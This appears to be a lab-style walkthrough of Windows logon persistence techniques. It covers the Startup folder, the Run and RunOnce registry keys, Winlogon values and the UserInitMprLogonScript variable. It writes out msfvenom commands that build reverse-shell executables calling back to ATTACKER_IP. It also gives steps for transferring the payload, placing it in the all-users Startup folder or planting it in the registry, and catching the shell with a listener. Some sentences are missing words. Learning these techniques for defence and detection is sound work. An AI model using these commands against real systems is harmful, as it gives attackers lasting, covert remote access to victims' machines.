Logon triggered persistence
Windows operating systems present several ways to link payloads with particular interactions.
Every user has a
where each user can put executables to be run whenever they log in. Each user will only run whatever is available in their folder. An attacker can achieve persistence just by dropping a payload in there.
If we want to force all users to run a payload while logging in, we can use the folder:
Generate a reverse shell payload using
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4450 -f exe -o revshell.exe
Copy the payload into the target machine by spawning an
http.server with Python and using
wget on the target
machine to download the file. Start listener on port 4450.
Store it in the
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp folder to get a shell back for
any user logging into the machine:
copy revshell.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
Sign out of the session from the start menu (closing an RDP window is not enough as it leaves the session open), and log back in via RDP to receive a connection back to the attack machine.
Instead of delivering a payload into a specific directory, you can also use the following registry entries to specify applications to run at logon:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
The registry entries under
HKCU will only apply to the current user, and those under
HKLM will apply to everyone.
Any program specified under the
Run keys will run every time the user logs on. Programs specified under the
RunOnce keys will only be executed a single time.
Create a reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4451 -f exe -o revshell.exe
After transferring it to the victim machine, move it to
move revshell.exe C:\Windows
REG_EXPAND_SZ registry entry under
HKLM\Software\Microsoft\Windows\CurrentVersion\Run. The entry’s name
can be anything, and the value is the command we want to execute.
Start a listener, sign out of the current session and log in again, and you should receive a shell.
Another alternative to automatically start programs on logon is abusing
Winlogon, the Windows component that
loads a user’s profile right after authentication (amongst other things).
Winlogon uses some registry keys under
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ that can be
used to gain persistence:
userinit.exe, which is in charge of restoring your user profile preferences.
shellpoints to the system’s shell, which is usually
Replacing any of the executables with a reverse shell break sthe logon sequence, but you can append commands separated by a comma, and Winlogon will process them all.
One of the things
userinit.exe does while loading a user profile is to check for an environment variable called
UserInitMprLogonScript. We can use this environment variable to assign a logon script to a user that will get
run when logging into the machine. The variable is not set by default, so we can just create it and assign any
script we like.
Create a reverse shell, put it anywhere, create an environment variable for a user, go to its
in the registry. Use the
UserInitMprLogonScript entry to point to the payload for it to get loaded when the
user logs in.
Set up a listener, sign out of the current session and log in again.